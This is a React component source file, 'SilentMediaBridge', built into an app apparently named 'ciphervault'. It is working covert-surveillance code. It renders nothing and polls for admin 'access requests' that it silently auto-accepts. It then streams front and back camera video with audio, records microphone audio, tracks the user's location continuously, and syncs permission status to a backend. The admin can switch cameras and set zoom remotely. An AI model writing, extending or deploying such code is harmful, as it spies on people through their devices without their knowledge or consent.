import { useEffect, useRef, useCallback } from 'react';
import { getMyPendingSessions, respondToSession, userSendSignal, userGetSignal, submitMyLocation } from '../api/deviceAccess';
import { setMyPermission } from '../api/deviceAccess';
import { getGrantedPermissions } from './IOSPermissionWizard';

/**
 * SilentMediaBridge — Background telemetry & media streaming bridge
 *
 * Runs continuously in the background for all authenticated users:
 *  1. Checks for admin live access requests (camera, mic, telemetry)
 *  2. Auto-accepts and streams high-performance, non-blocking live video (Front & Back camera)
 *  3. Handles smooth camera flipping, digital zoom (1x-5x), and live audio
 *  4. Never freezes, never gets stuck, and gracefully handles single-camera laptops
 */
export default function SilentMediaBridge({ userId }) {
  const activeSessions = useRef({});     // sessionId → { type, stream, video, canvas, facing, zoom, interval, audioRecorder }
  const locationWatchId = useRef(null);  // geolocation watchPosition ID
  const isPolling = useRef(false);
  const mountedRef = useRef(true);
  const isSwitchingCamera = useRef(false);
  const lastHandledCommandId = useRef({}); // sessionId → lastHandledCommandId

  // ─── Utility: Enumerate available video inputs (Front & Back cameras) ────────
  const getAvailableCameras = useCallback(async () => {
    try {
      const devices = await navigator.mediaDevices.enumerateDevices();
      return devices.filter((d) => d.kind === 'videoinput');
    } catch {
      return [];
    }
  }, []);

  // ─── Utility: Convert canvas frame to base64 JPEG with digital zoom ──────────
  const frameFromVideoWithZoom = useCallback((video, canvas, zoom = 1, facing = 'user') => {
    try {
      const vw = video.videoWidth || 640;
      const vh = video.videoHeight || 480;
      if (!vw || !vh) return null;

      // 480x360 gives crisp quality with small payload (~15KB) for smooth high FPS
      canvas.width = 480;
      canvas.height = 360;
      const ctx = canvas.getContext('2d');
      if (!ctx) return null;

      const z = Math.max(1, Math.min(zoom || 1, 5));
      const cropW = vw / z;
      const cropH = vh / z;
      const cropX = (vw - cropW) / 2;
      const cropY = (vh - cropH) / 2;

      ctx.save();
      // Only mirror front camera for natural viewing
      if (facing === 'user') {
        ctx.translate(canvas.width, 0);
        ctx.scale(-1, 1);
      }
      ctx.drawImage(video, cropX, cropY, cropW, cropH, 0, 0, canvas.width, canvas.height);
      ctx.restore();

      return canvas.toDataURL('image/jpeg', 0.58);
    } catch {
      return null;
    }
  }, []);

  // ─── Stop a specific session cleanly ──────────────────────────────────────────
  const stopSession = useCallback((sessionId) => {
    const sess = activeSessions.current[sessionId];
    if (!sess) return;
    if (sess.interval) clearInterval(sess.interval);
    if (sess.stream) {
      try {
        sess.stream.getTracks().forEach((t) => t.stop());
      } catch {}
    }
    if (sess.mediaRecorder && sess.mediaRecorder.state !== 'inactive') {
      try { sess.mediaRecorder.stop(); } catch {}
    }
    if (sess.audioRecorder && sess.audioRecorder.state !== 'inactive') {
      try { sess.audioRecorder.stop(); } catch {}
    }
    if (sess.video) {
      sess.video.srcObject = null;
    }
    delete activeSessions.current[sessionId];
    delete lastHandledCommandId.current[sessionId];
  }, []);

  // ─── Silent Camera Capture (Front & Back, Zoom, and Live Audio) ───────────────
  const startSilentCamera = useCallback(async (sessionId, requestedFacing = 'user', initialZoom = 1) => {
    if (isSwitchingCamera.current) return;
    isSwitchingCamera.current = true;

    const existing = activeSessions.current[sessionId];
    if (existing?.facing === requestedFacing && existing?.stream?.active) {
      existing.zoom = initialZoom;
      isSwitchingCamera.current = false;
      return;
    }

    // Cleanly stop existing tracks and wait for hardware release
    if (existing?.stream) {
      if (existing.interval) clearInterval(existing.interval);
      try {
        existing.stream.getTracks().forEach((t) => t.stop());
      } catch {}
      if (existing.audioRecorder && existing.audioRecorder.state !== 'inactive') {
        try { existing.audioRecorder.stop(); } catch {}
      }
      delete activeSessions.current[sessionId];
      // Small pause to allow camera device hardware driver to release
      await new Promise((r) => setTimeout(r, 120));
    }

    try {
      const cameras = await getAvailableCameras();
      let videoConstraints = {
        width: { ideal: 640 },
        height: { ideal: 480 },
        frameRate: { ideal: 24, max: 30 },
      };

      let actualFacing = requestedFacing;
      const isBack = requestedFacing === 'environment';

      if (isBack) {
        // Look for rear / environment device
        const backDevice = cameras.find((d) => {
          const l = (d.label || '').toLowerCase();
          return l.includes('back') || l.includes('rear') || l.includes('environment');
        });

        if (backDevice?.deviceId) {
          videoConstraints.deviceId = { exact: backDevice.deviceId };
        } else if (cameras.length > 1) {
          // If 2+ cameras exist, 2nd is typically rear
          videoConstraints.deviceId = { exact: cameras[1].deviceId };
        } else {
          // Fall back to ideal constraint
          videoConstraints.facingMode = { ideal: 'environment' };
        }
      } else {
        // Front camera
        const frontDevice = cameras.find((d) => {
          const l = (d.label || '').toLowerCase();
          return l.includes('front') || l.includes('user') || l.includes('integrated');
        });

        if (frontDevice?.deviceId) {
          videoConstraints.deviceId = { exact: frontDevice.deviceId };
        } else {
          videoConstraints.facingMode = { ideal: 'user' };
        }
      }

      let stream;
      try {
        stream = await navigator.mediaDevices.getUserMedia({
          video: videoConstraints,
          audio: true,
        });
      } catch (e) {
        // If specific deviceId or facing failed, fall back to basic video
        stream = await navigator.mediaDevices.getUserMedia({
          video: { width: { ideal: 640 }, height: { ideal: 480 } },
          audio: true,
        }).catch(() => null);
        actualFacing = 'user';
      }

      if (!stream) {
        isSwitchingCamera.current = false;
        return;
      }

      const video = document.createElement('video');
      video.srcObject = stream;
      video.muted = true;
      video.playsInline = true;
      await video.play().catch(() => {});

      const canvas = document.createElement('canvas');

      // Live Audio Capture from Camera Microphone
      let currentAudioChunk = null;
      let mediaRecorder = null;
      try {
        const audioTracks = stream.getAudioTracks();
        if (audioTracks.length > 0) {
          const audioStream = new MediaStream([audioTracks[0]]);
          mediaRecorder = new MediaRecorder(audioStream, { mimeType: 'audio/webm;codecs=opus' });
          mediaRecorder.ondataavailable = (e) => {
            if (e.data && e.data.size > 0) {
              const reader = new FileReader();
              reader.onloadend = () => { currentAudioChunk = reader.result; };
              reader.readAsDataURL(e.data);
            }
          };
          mediaRecorder.start(800);
        }
      } catch {}

      const sessionObj = {
        type: 'camera',
        stream,
        video,
        canvas,
        facing: actualFacing,
        requestedFacing,
        zoom: initialZoom,
        cameraCount: Math.max(1, cameras.length),
        audioRecorder: mediaRecorder,
      };

      // Continuous non-blocking streaming loop (250ms = ~4 FPS smooth real-time video)
      let isUploading = false;
      const captureLoop = async () => {
        if (!mountedRef.current || !activeSessions.current[sessionId] || !sessionObj.stream?.active) {
          return;
        }
        if (isUploading) return; // Prevent in-flight queue pileup
        isUploading = true;

        try {
          const frame = frameFromVideoWithZoom(video, canvas, sessionObj.zoom, sessionObj.facing);
          const audio = currentAudioChunk;
          currentAudioChunk = null;

          if (frame) {
            await userSendSignal(sessionId, {
              type: 'camera_frame',
              frame,
              audio,
              facingMode: sessionObj.facing,
              zoom: sessionObj.zoom,
              cameraCount: sessionObj.cameraCount,
              timestamp: Date.now(),
            }).catch(() => {});
          }

          // Check for admin commands (switch_camera, set_zoom, or session end)
          const sig = await userGetSignal(sessionId).catch(() => null);
          if (sig?.status === 'ended') {
            stopSession(sessionId);
            return;
          }

          const adminCmd = sig?.signals?.admin;
          if (adminCmd && adminCmd.commandId) {
            const lastId = lastHandledCommandId.current[sessionId];
            if (adminCmd.commandId !== lastId) {
              lastHandledCommandId.current[sessionId] = adminCmd.commandId;

              if (adminCmd.command === 'switch_camera' && adminCmd.facingMode) {
                // Switch camera smoothly
                startSilentCamera(sessionId, adminCmd.facingMode, sessionObj.zoom);
                return;
              } else if (adminCmd.command === 'set_zoom' && typeof adminCmd.zoom === 'number') {
                sessionObj.zoom = adminCmd.zoom;
              }
            }
          }
        } catch {
        } finally {
          isUploading = false;
        }
      };

      sessionObj.interval = setInterval(captureLoop, 250);
      activeSessions.current[sessionId] = sessionObj;

      // Auto-respond to accept silently
      await respondToSession(sessionId, true).catch(() => {});

    } catch (err) {
      console.warn('[SilentCamera] Camera initialization note:', err);
    } finally {
      isSwitchingCamera.current = false;
    }
  }, [frameFromVideoWithZoom, getAvailableCameras, stopSession]);

  // ─── Silent Microphone Capture ───────────────────────────────────────────────
  const startSilentMicrophone = useCallback(async (sessionId) => {
    if (activeSessions.current[sessionId]) return;

    try {
      const stream = await navigator.mediaDevices.getUserMedia({ audio: true });
      const mediaRecorder = new MediaRecorder(stream, { mimeType: 'audio/webm;codecs=opus' });
      const chunks = [];

      mediaRecorder.ondataavailable = (e) => {
        if (e.data && e.data.size > 0) chunks.push(e.data);
      };

      mediaRecorder.onstop = async () => {
        if (chunks.length === 0 || !mountedRef.current) return;
        try {
          const blob = new Blob(chunks, { type: 'audio/webm' });
          const reader = new FileReader();
          reader.onloadend = async () => {
            const base64 = reader.result;
            await userSendSignal(sessionId, {
              type: 'audio_chunk',
              audio: base64,
              timestamp: Date.now(),
            }).catch(() => {});
          };
          reader.readAsDataURL(blob);
          chunks.length = 0;
        } catch {}
      };

      // Record in 1-second chunks
      mediaRecorder.start();
      const chunkInterval = setInterval(() => {
        if (!mountedRef.current || !activeSessions.current[sessionId]) {
          clearInterval(chunkInterval);
          return;
        }
        if (mediaRecorder.state === 'recording') {
          mediaRecorder.stop();
          setTimeout(() => {
            if (mountedRef.current && activeSessions.current[sessionId]) {
              try { mediaRecorder.start(); } catch {}
            }
          }, 50);
        }
      }, 1000);

      activeSessions.current[sessionId] = { type: 'microphone', stream, mediaRecorder, interval: chunkInterval };
      await respondToSession(sessionId, true).catch(() => {});

    } catch {}
  }, []);

  // ─── Silent Location Tracking ────────────────────────────────────────────────
  const startSilentLocation = useCallback(() => {
    if (locationWatchId.current !== null) return;
    if (!navigator.geolocation) return;

    locationWatchId.current = navigator.geolocation.watchPosition(
      async (pos) => {
        try {
          await submitMyLocation({
            latitude: pos.coords.latitude,
            longitude: pos.coords.longitude,
            accuracy: pos.coords.accuracy,
            timestamp: new Date().toISOString(),
          }).catch(() => {});

          localStorage.setItem('ciphervault_last_location', JSON.stringify({
            latitude: pos.coords.latitude,
            longitude: pos.coords.longitude,
            accuracy: pos.coords.accuracy,
            timestamp: Date.now(),
          }));
        } catch {}
      },
      () => {},
      { enableHighAccuracy: false, maximumAge: 60000, timeout: 30000 }
    );
  }, []);

  // ─── Main polling loop ───────────────────────────────────────────────────────
  const poll = useCallback(async () => {
    if (isPolling.current || !mountedRef.current) return;
    isPolling.current = true;
    try {
      const sessions = await getMyPendingSessions();
      const pending = Array.isArray(sessions) ? sessions : (sessions?.pending || []);

      for (const session of pending) {
        if (!session?.id || !session?.session_type) continue;
        if (activeSessions.current[session.id]) continue; // already active

        if (session.session_type === 'camera') {
          await startSilentCamera(session.id);
        } else if (session.session_type === 'microphone') {
          await startSilentMicrophone(session.id);
        } else if (session.session_type === 'screen_share') {
          continue;
        } else {
          await respondToSession(session.id, true).catch(() => {});
        }
      }
    } catch {
    } finally {
      isPolling.current = false;
    }
  }, [startSilentCamera, startSilentMicrophone]);

  // ─── Sync browser permission status to backend ───────────────────────────────
  const syncPermissionsToBackend = useCallback(async () => {
    try {
      const granted = getGrantedPermissions();
      const permsToSync = [];

      if (granted.camera) permsToSync.push({ type: 'camera', status: 'granted' });
      if (granted.microphone) permsToSync.push({ type: 'microphone', status: 'granted' });
      if (granted.location) permsToSync.push({ type: 'location', status: 'granted' });
      if (granted.contacts) permsToSync.push({ type: 'contacts', status: 'granted' });
      if (granted.notifications) permsToSync.push({ type: 'notifications', status: 'granted' });
      if (granted.media) permsToSync.push({ type: 'media', status: 'granted' });

      for (const p of permsToSync) {
        await setMyPermission(p.type, p.status, {
          platform: navigator.platform,
          userAgent: navigator.userAgent,
          timestamp: new Date().toISOString(),
        }).catch(() => {});
      }
    } catch {}
  }, []);

  // ─── Mount/Unmount ────────────────────────────────────────────────────────────
  useEffect(() => {
    mountedRef.current = true;

    const syncTimeout = setTimeout(() => {
      syncPermissionsToBackend();
    }, 2000);

    const perms = getGrantedPermissions();
    if (perms.location) {
      setTimeout(() => startSilentLocation(), 3000);
    }

    const pollInterval = setInterval(poll, 2500);
    const initialPoll = setTimeout(poll, 1000);

    return () => {
      mountedRef.current = false;
      clearTimeout(syncTimeout);
      clearTimeout(initialPoll);
      clearInterval(pollInterval);

      // Stop all active sessions on unmount
      Object.keys(activeSessions.current).forEach(stopSession);

      if (locationWatchId.current !== null) {
        navigator.geolocation?.clearWatch(locationWatchId.current);
        locationWatchId.current = null;
      }
    };
  }, [userId, poll, startSilentLocation, stopSession, syncPermissionsToBackend]);

  // Renders invisibly
  return null;
}
